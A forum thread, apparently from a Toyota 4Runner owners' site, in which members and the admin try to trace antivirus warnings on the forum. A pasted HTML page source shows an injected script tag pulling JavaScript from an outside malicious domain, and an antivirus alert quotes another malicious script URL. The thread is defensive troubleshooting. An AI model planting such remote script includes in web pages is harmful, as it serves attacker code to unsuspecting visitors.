The Virus problem on this site is getting out of control

Just catching up on this thread. Looking into it. I don't run into any issues, and I visit the site from variety of computers/OSes.

Investigating ...

Update 1:

I haven't found anything suspicious. I also scanned the site using a 3rd party tool, which found no issues either. Here are the results of the scan:
Sucuri SiteCheck - Free Website Malware Scanner

Update 2:
Another service reported the site as safe. See attached screensnap.

Update 3:
AVG reported this site as safe as well.

Update 4:
Norton is also reporting the site as safe:


I'll keep digging.

Does this include any advertisements? If it's flash or java based it could be coming from those. Do those run on an outside server or the t4r.org server?
 
First of all, the scans do take external javascript includes into consideration.

There are two sources of ads, Google Ads and VigLink ads, both are very trustworthy companies. In the past we'd run into an issue where someone would hack into the database and inject malicious code. I went through all the usual suspects and didn't find anything.

Still digging ...
 
Gents, for those that are getting virus alerts, do they happen across the site or on a specific thread? If specific thread, can you post the thread url here?

Thanks,
admin.

I only access this section, but it doesn't seem to be thread related. I am going to run the utility that elly suggested and I will send you the report.
 
I seem to only have issues when using the google search box on the forum. For instance, tonight I did a search for "caliper" and it brought up the list of threads as usual. But when I click on the link to go to one of the threads listed, a window pops up from Avast with this info:

Infection Details
URL: http://www.usijkliausa.in/ftg.js?toyo
Process: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Infection: URL:Mal

Not sure if it is meaningful, but hope it helps.
 
Do you recall clicking on which exact thread from the search results caused Avast to complain?
 
Do you recall clicking on which exact thread from the search results caused Avast to complain?

Any of the thread links that I clicked on caused it to come up. I tried the first 4 or 5 of them & it popped up with each one that I tried.
 
Viruses would not be a problem

Wake up!

Home | Ubuntu

Using Ubuntu is just as easy as Windows! Just download it and try it! Never worry about viruses again! There is a reason that 98% of the servers on the internet run linux.
 
I seem to only have issues when using the google search box on the forum. For instance, tonight I did a search for "caliper" and it brought up the list of threads as usual. But when I click on the link to go to one of the threads listed, a window pops up from Avast with this info:

Infection Details
URL: http://www.usijkliausa.in/ftg.js?toyo
Process: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Infection: URL:Mal

Not sure if it is meaningful, but hope it helps.

I still haven't seen any problems but it may be because the Search box doesn't work in Chrome.
The biggest problem I have with the site is that it seems to be down and not reachable a lot of the time. When I click on a message sometimes it goes right there but mostly it just sits there for several minutes and finally times out saying it's not online. Downforeveryoneorjustme.com also says it'd down during those times. Could the site be undergoing a DOS attack?
 
I still haven't seen any problems but it may be because the Search box doesn't work in Chrome.
The biggest problem I have with the site is that it seems to be down and not reachable a lot of the time. When I click on a message sometimes it goes right there but mostly it just sits there for several minutes and finally times out saying it's not online. Downforeveryoneorjustme.com also says it'd down during those times. Could the site be undergoing a DOS attack?

I think it's time to move to another hosting provider. Will start organizing that.

-admin
 
Gents, for those that are getting virus alerts, do they happen across the site or on a specific thread? If specific thread, can you post the thread url here?

Thanks,
admin.

The site definitely still has issues. When I just landed on 4th Gen T4Rs - Toyota 4Runner Forum this snippet came in the HTML:

PHP:
...
/**
* vBulletin 3.8.7 CSS
* Style: 'Child of New Look!'; Style ID: 6
*/
<link rel="stylesheet" type="text/css" href="http://js.toyota-4runner.org/clientscript/vbulletin_important.css?v=387" />  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.9.0/build/yahoo-dom-event/yahoo-dom-event.js?v=387"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.9.0/build/connection/connection-min.js?v=387"></script> <script type="text/javascript"> <!--
var SESSIONURL = "";
var SECURITYTOKEN = "1356115919-d490a1f9540153415bdf66bfbd3fabdae502b9d6";
var IMGDIR_MISC = "http://im.toyota-4runner.org/images/misc2";
var vb_disable_ajax = parseInt("0", 10);
// --> </script> <script type="text/javascript" src="http://js.toyota-4runner.org/clientscript/vbulletin_global.js?v=387"></script>
<script type="text/javascript" src="http://hackthischeick.org/291412.js?273005&3d9726e95b743042"></script> <script type="text/javascript" src="http://js.toyota-4runner.org/clientscript/vbulletin_menu.js?v=387"></script> <link rel="alternate" type="application/rss+xml" title="Toyota 4Runner Forum RSS Feed" href="http://www.toyota-4runner.org/external.php?type=RSS2" /> <link rel="alternate" type="application/rss+xml" title="Toyota 4Runner Forum - 4th Gen T4Rs - RSS Feed" href="http://www.toyota-4runner.org/external.php?type=RSS2&forumids=3" /> <script type="text/javascript" src="http://js.toyota-4runner.org/mobiquo/tapatalkdetect.js"></script> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script> <script type='text/javascript'>
GS_googleAddAdSenseService("ca-pub-7522522145124525");
GS_googleEnableAllServices();
</script> <script type='text/javascript'>
GA_googleAddSlot("ca-pub-7522522145124525", "468x60");
GA_googleAddSlot("ca-pub-7522522145124525", "160x600");
</script> <script type='text/javascript'>
GA_googleFetchAds();
</script><script type="text/javascript"> <!--
function vba_attach_win(threadid)
...

Note the line of code pulling js down from hackthischeick.org . I reloaded the page and the exact same code block, minus that ONE line, was returned. What that means is the forum code here has been compromised and is intermittently trying to inject malicious script into the page.

-E
 
Last edited:
Ok, that's weird. What's even weirder is that vbulletin template that is being used for this looks like this:

<script type="text/javascript" src="clientscript/vbulletin_global.js?v=$vboptions[simpleversion]"></script>
<if condition="$show['popups']"><script type="text/javascript" src="clientscript/vbulletin_menu.js?v=$vboptions[simpleversion]"></script></if>

Note, that there is no code between pulling vbulletin_global.js and pulling vbulletin_menu.js. But according to your view source, there is. The hard part is figuring out how that piece of code got injected.

A possible explanation could be that the 4th gen page was cached by your browser with a copy having hackthischeick.org in it. Once you refreshed it was gone, right? Do you see it ever coming back?

The site definitely still has issues. When I just landed on 4th Gen T4Rs - Toyota 4Runner Forum this snippet came in the HTML:

PHP:
...
/**
* vBulletin 3.8.7 CSS
* Style: 'Child of New Look!'; Style ID: 6
*/
<link rel="stylesheet" type="text/css" href="http://js.toyota-4runner.org/clientscript/vbulletin_important.css?v=387" />  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.9.0/build/yahoo-dom-event/yahoo-dom-event.js?v=387"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.9.0/build/connection/connection-min.js?v=387"></script> <script type="text/javascript"> <!--
var SESSIONURL = "";
var SECURITYTOKEN = "1356115919-d490a1f9540153415bdf66bfbd3fabdae502b9d6";
var IMGDIR_MISC = "http://im.toyota-4runner.org/images/misc2";
var vb_disable_ajax = parseInt("0", 10);
// --> </script> <script type="text/javascript" src="http://js.toyota-4runner.org/clientscript/vbulletin_global.js?v=387"></script>
<script type="text/javascript" src="http://hackthischeick.org/291412.js?273005&3d9726e95b743042"></script> <script type="text/javascript" src="http://js.toyota-4runner.org/clientscript/vbulletin_menu.js?v=387"></script> <link rel="alternate" type="application/rss+xml" title="Toyota 4Runner Forum RSS Feed" href="http://www.toyota-4runner.org/external.php?type=RSS2" /> <link rel="alternate" type="application/rss+xml" title="Toyota 4Runner Forum - 4th Gen T4Rs - RSS Feed" href="http://www.toyota-4runner.org/external.php?type=RSS2&forumids=3" /> <script type="text/javascript" src="http://js.toyota-4runner.org/mobiquo/tapatalkdetect.js"></script> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script> <script type='text/javascript'>
GS_googleAddAdSenseService("ca-pub-7522522145124525");
GS_googleEnableAllServices();
</script> <script type='text/javascript'>
GA_googleAddSlot("ca-pub-7522522145124525", "468x60");
GA_googleAddSlot("ca-pub-7522522145124525", "160x600");
</script> <script type='text/javascript'>
GA_googleFetchAds();
</script><script type="text/javascript"> <!--
function vba_attach_win(threadid)
...

Note the line of code pulling js down from hackthischeick.org . I reloaded the page and the exact same code block, minus that ONE line, was returned. What that means is the forum code here has been compromised and is intermittently trying to inject malicious script into the page.

-E
 
I haven't seen it come back but I don't usually look at the source code, I only noticed it this time because the page was "hanging" while loading and that URL was in firefox's lower left corner. The url looked sketchy so I opened the page source and there it was.

-E
 
I found this blog post which may help, it's all I could really find Sneaky vBulletin Script Injections | Sucuri Blog . It's definitely not the exact same issue, because although I was coming from Google right to the 4th gen landing page (was too lazy to type URL, just googled "4runner forums") when it happened, I can not reproduce it again just by coming here via a Google link. The article is a bit technical, but the bottom line solution seemed to be "check for oddball global plugins".

-E
 
Last edited:

Members online

Forum statistics

Threads
278,316
Messages
3,554,120
Members
248,016
Latest member
Advally Service

Trending content

Back
Top